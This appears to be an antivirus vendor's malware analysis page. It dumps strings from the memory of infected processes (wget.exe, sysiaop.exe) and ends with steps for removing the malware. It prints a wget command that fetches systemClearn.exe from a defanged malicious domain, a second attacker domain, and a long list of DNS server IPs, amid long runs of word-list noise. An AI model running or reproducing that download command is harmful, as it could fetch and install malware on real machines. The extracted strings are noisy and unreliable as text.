AUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
8888888888
22:14:01
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
get.exe
GetCPInfo
RegCloseKey
RegOpenKeyExA
`.idata
.reloc
TEDKMNSR4g.LF'[
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
WSOCK32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe

wget.exe_3540_rwx_000B0000_00010000:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\wget.exe -o C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\res.txt hXXp://do9fli.a1free9bird.com/systemClearn.exe -O C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe -T 30 -t 60 -N
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\res.txt
hXXp://do9fli.a1free9bird.com/systemClearn.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe
ComSpec=C:\Windows\system32\cmd.exe
OS=Windows_NT
Path=C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Wireshark
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
SystemRoot=C:\Windows
windir=C:\Windows
windows_tracing_flags=3
windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
Wget hXXp://do9fli.a1free9bird.com/systemClearn.exe
do9fli.a1free9bird.com
/systemClearn.exe
systemClearn.exe
172.104.65.83
hXXp://do9fli.a1free9bird.com:80/systemClearn.exe
rd.co
Connecting to do9fli.a1free9bird.com:80... :80/systemClearn.exe
(try:10) => `C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\systemClearn.exe'
Wget hXXp://do9fli.a1free9bird.com:80/systemClearn.exe
1free9bird.com

wget.exe_3540_rwx_00401000_0002D000:

E.Ph"
E.It!
%a %b %e %H:%M:%S %Y
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Created fd %d.
Closing fd %d
Master socket fd %d bound.
Created socket fd %d.
PTF.c
!((cmd & DO_LIST) && (cmd & DO_RETR))
(cmd & (DO_LIST | DO_CWD | DO_RETR | DO_LOGIN)) != 0
user && passwd
Connecting to %s:%hu...
%s: %s
socket: %s
Connection to %s:%hu refused.
connect: %s
Logging in as %s ...
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
%d.%d.%d.%d
Will try connecting to %s:%hu.
==> PORT ...
Bind error (%s).
Invalid PORT.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
Length: %s
[%s to go]
%s: %s, closing control connection.
%s (%s) - Data connection: %s;
%s (%s) -
File `%s' already there, not retrieving.
(try:-)
--%s-- %s
%s => `%s'
%s (%s) - `%s' saved [%ld]
%s URL: %s [%ld] -> "%s" [%d]
.listing
Using `%s' as listing tmp file.
unlink: %s
Removed `%s'.
Recursion depth %d exceeded max. depth %d.
Local file `%s' is more recent, not retrieving.
Symlinks not supported, skipping symlink `%s'.
Skipping directory `%s'.
%s: unknown/unsupported file type.
%s: corrupt time-stamp.
Unrecognized permissions for %s.
Will not retrieve dirs since depth is %d (max %d).
/%s%s%s
Not descending to `%s' as it is excluded/not-included.
Rejecting `%s'.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s' [%ld].
Wrote HTML-ized index to `%s'.
331 s/key
331 opiekey
%s%s%s
--> %s
--> PASS Turtle Power!
%d,%d,%d,%d,%d,%d
PORT
month: %s;
day: %d;
year: %d (no tm);
time: d:d:d (no yr);
link to: %s
trailing `*' on exec.
store is `%s'
%s: option `%s' is ambiguous
%s: option `--%s' doesn't allow an argument
%s: option `%c%s' doesn't allow an argument
%s: option `%s' requires an argument
%s: unrecognized option `--%s'
%s: unrecognized option `%c%s'
%s: illegal option -- %c
%s: option requires an argument -- %c
Checking for %s.
%s was already used, by that name.
This is the first time I hear about host %s by that name.
We've dealt with host %s, but under the name %s.
Comparing hosts %s and %s...
They are alike, after realhost()->%s.
They are not the same (%s, %s).
%s: Cannot determine user-id.
%s: Warning: gethostname failed
%s: Warning: cannot determine local IP address.
%s: Warning: cannot reverse-lookup local IP address.
%s@%s
%s%s%s@
Index of /%s on %s:%d
%d %s d
d:d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
HTTP/
http.c
%s: %s.
Referer: %s
Wget/%s
%s %s HTTP/1.0
User-Agent: %s
Host: %s:%d
Accept: %s
%s%s%s%s%s%s
%s---request end---
Failed writing HTTP request.
%s request sent, awaiting response...
Read error (%s) in headers.
%d %s
Location: %s%s
(%s to go)
Warning: wildcards not supported in HTTP.
File `%s' already there, will not retrieve.
Cannot write to `%s' (%s).
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
%s (%s) - `%s' saved [%ld/%ld]
%s URL:%s [%ld/%ld] -> "%s" [%d]
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - Connection closed at byte %ld.
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Connection closed at byte %ld/%ld.
%s (%s) - Read error at byte %ld (%s).
%s (%s) - Read error at byte %ld/%ld (%s).
%a, %d %b %Y %T
%a, %d-%b-%y %T
%a %b %d %T %Y
%s:%s
%s: Basic %s
Authorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
followftp
ftpproxy
httppasswd
httpproxy
httpuser
login
passiveftp
passwd
proxypasswd
%s: %s: %s.
wget.ini
%swget.ini
%s: Cannot read %s (%s).
%s: Error in %s at line %d.
%s: BUG: unknown command `%s', value `%s'.
%s: %s: Please specify on or off.
%s: %s: Invalid specification `%s'.
%s: Invalid specification `%s'
%s: %s: %s
follow-ftp
passive-ftp
http-passwd
http-user
proxy-passwd
Usage: %s [OPTION]... [URL]...
GNU Wget %s, a non-interactive network retriever.
Mail bug reports and suggestions to <bug-wget@gnu.org>.
--follow-ftp follow FTP links from HTML documents.
-r, --recursive recursive web-suck -- use with care!.
-nr, --dont-remove-listing don't remove `.listing' files.
FTP options:
--retr-symlinks retrieve FTP symbolic links.
--passive-ftp use the "passive" transfer mode.
HTTP options:
--http-user=USER set http user to USER.
--http-passwd=PASS set http password to PASS.
--proxy-passwd=PASS set PASS as proxy password.
-s, --save-headers save the HTTP headers to file.
-i, --input-file=FILE read URL-s from file.
-e, --execute=COMMAND execute a `.wgetrc' command.
%s%s%s%s%s%s%s%s%s%s
GNU Wget %s
Written by Hrvoje Niksic <hniksic@srce.hr>.
%s: %s: invalid command
%s: illegal option -- `-n%c'
Try `%s --help' for more options.
%s: missing URL
Windows
DEBUG output created by Wget %s on %s.
No URLs found in %s.
FINISHED --%s--
Downloaded: %s bytes in %d files
Download quota (%s bytes) EXCEEDED!
.netrc
%s/%s
password
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
this_url != NULL
Double yuck! The *base* URL is broken.
Yuck! A bad URL.
u->url != NULL
Uh, it is FTP but i'm not in the mood to follow FTP.
%s (%s) is excluded/not-included.
%s (%s) does not match acc/rej rules.
robots.txt
Stuffing %s because %s forbids it.
%s is not text/html so we don't chase.
Removing %s.
Removing %s since it should be rejected.
%s already in list, so we don't load.
Rescanning %s
It should correspond to %s.
I cannot find the corresponding URL.
%s flagged for conversion, local %s
err == URLOK && u->proto == URLHTTP
Loading robots.txt; please ignore errors.
Line: %s
Matching %s against:
[=%%]
[ skipping %dK ]
P?%s: %s.
Proxy %s: %s.
Proxy %s: Must be HTTP.
u->proto != URLFILE
%s: Redirection to itself.
http:
https:
rlogin:
shttp:
hXXp://
PTF://
:*<>"%{}|\^[]`
url.c
parseurl ("%s") ->
host %s ->
port %hu ->
opath %s ->
dir %s -> file %s ->
ndir %s
!"#'(),>`{}|<>
Loaded %s (size %ld).
Loaded HTML file %s (size %ld).
Error (%s): Link %s without a base provided.
Error (%s): Base %s relative, without referer URL.
file %s; this_url %s; base %s
link: %s; constr: %s
%s.%d
Removing %s because of directory danger!
index.html
http_proxy
ftp_proxy
Converting %s...
Cannot convert links in %s: %s
Skipping %s at position %d (flags %d).
ABS2REL: %s to %s at position %d in %s.
%s: %s: Not enough memory.
d:d:d
Unknown/unsupported protocol
Invalid port specification
utime: %s
Unlinking %s (symlink).
Failed to unlink symlink `%s': %s
1.5.3.1
CTRL Break received, redirecting output to `%s'.
Output will be written to `%s'.
Wget %s%s
%s%s.HLP
Starting WinHelp %s
%s: Couldn't find usable socket driver.
Assertion failed: %hs, file %hs, line %d
!BREAKRETURN =
%hs, file %hs, line %d
Broken pipe
USER32.DLL
The instruction at 0x00000000 caused a denormal operand floating point
The instruction at 0x00000000 caused an invalid operation floating point
A privileged instruction was executed at address 0x00000000.
An illegal instruction was executed at address 0x00000000.
Floating-point support not loaded
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
8888888888
22:14:01
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
get.exe
GetCPInfo
RegCloseKey
RegOpenKeyExA
`.idata
.reloc
TEDKMNSR4g.LF'[
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wget.exe

sysiaop.exe_764:

.text
`.rdata
@.data
.rsrc
_WSSh
^VSSh
SSSh`[@
SSShfd@
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
ADVAPI32.dll
WS2_32.dll
GetCPInfo
202.100.192.68
216.8.228.88
218.85.152.99
219.150.32.132
69.155.200.6
202.102.3.144
202.102.154.3
202.102.134.68
202.102.128.68
211.139.73.34
211.142.210.100
216.8.209.88
219.147.198.230
222.221.5.240
222.172.200.68
221.130.252.200
220.168.208.6
219.141.148.39
219.141.148.37
219.141.140.10
219.141.136.10
219.72.225.253
218.202.152.130
216.8.196.88
211.162.62.1
211.147.6.3
211.142.210.98
211.141.16.99
211.139.2.18
211.139.1.3
211.138.240.100
211.138.164.6
211.138.145.194
211.97.64.129
209.234.196.12
208.196.63.2
206.169.217.10
203.142.100.21
203.142.100.18
202.102.152.3
202.102.24.34
202.102.8.141
202.102.3.141
202.101.226.68
202.101.224.68
202.101.98.55
202.101.6.2
202.99.168.8
202.98.224.68
202.96.128.68
202.96.96.68
202.96.86.18
202.60.252.8
202.14.67.14
202.14.67.4
76.77.208.23
72.51.175.10
70.254.229.2
68.105.29.16
65.39.139.53
64.207.64.5
64.192.0.10
64.30.215.129
64.13.131.34
63.135.48.130
61.235.164.18
61.234.254.5
61.166.25.129
61.166.150.123
61.60.224.5
61.60.224.3
61.31.1.1
61.10.1.130
58.241.208.46
24.154.1.4
222.52.118.162
222.47.62.142
222.47.29.93
222.46.120.5
222.45.1.40
222.45.0.110
221.11.132.2
221.5.88.88
219.239.26.42
218.241.108.229
211.98.72.7
211.97.96.65
211.93.64.129
211.90.80.65
211.90.72.65
211.78.130.1
210.38.192.33
209.143.0.10
205.171.3.65
205.171.3.25
205.171.2.25
202.203.224.33
202.203.208.33
202.203.192.33
202.203.160.33
202.203.144.33
202.203.128.33
202.117.96.10
202.117.96.5
202.115.32.39
202.115.32.36
202.114.240.6
202.113.16.10
202.38.64.1
198.41.0.4
192.5.5.241
174.34.129.34
168.95.192.174
168.95.192.1
168.95.1.1
165.21.100.88
165.21.83.88
139.175.252.16
139.175.55.244
139.175.10.20
129.137.255.4
129.66.172.9
128.8.10.90
124.207.160.110
119.233.255.228
114.114.115.115
114.114.114.114
68.208.149.226
66.218.245.13
66.209.140.124
65.125.132.1
64.135.2.250
64.119.60.5
64.118.80.141
64.79.224.27
64.79.224.3
64.58.15.2
64.57.176.12
61.236.93.33
61.235.70.98
61.31.233.1
12.127.17.71
12.127.16.67
12.49.240.68
12.32.34.33
12.17.136.131
8.8.192.35
8.8.8.8
8.8.4.4
8.2.208.5
74.222.30.2
68.234.128.70
67.214.64.6
64.89.247.15
64.140.128.10
64.0.55.201
61.139.54.66
61.139.39.73
39.89.10.132
216.87.84.211
211.98.4.1
211.98.2.4
202.45.84.67
202.45.84.58
202.102.224.68
192.58.128.30
192.112.36.4
63.88.42.5
38.98.10.132
63.251.129.33
64.91.89.2
64.58.254.2
205.171.2.65
64.85.177.10
61.10.0.130
222.39.47.53
222.39.47.52
222.39.47.51
222.39.47.50
self.location=
GET %s%s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s
jdfwkey
GET %s HTTP/1.1
%s%s%s%s%s%s%s%s%s%s%s
%d.%d.%d.%d
192.168.1.10
222.222.222.222
192.168.1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0;)
HTTP/1.1
ka7ds.a1free9bird.com
127.0.0.1:8080
del to access management information about operating syWindows Management Instrumantation
vice. If this service is stopped, most Windows-based software will not function properly. If
Iphlpapi.dll
winÊËÍ.exe
%dMbps
\rawip.ini
Win %s
%dGbps
zcÁ
C:\Windows\sysiaop.exe
Windows
winhlp32.exe
winhlp32.exe
Windows Winhlp32 Stub
5.2.3790.0 (srv03_rtm.030324-2048)
WINHLP32.EXE
Microsoft(R) Windows(R) Operating System
5.2.3790.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    systemCheck.exe:1832
    FuckTheWannaCry.exe:2124
    %original file name%.exe:1976
    kuxmbedujme.exe:3040
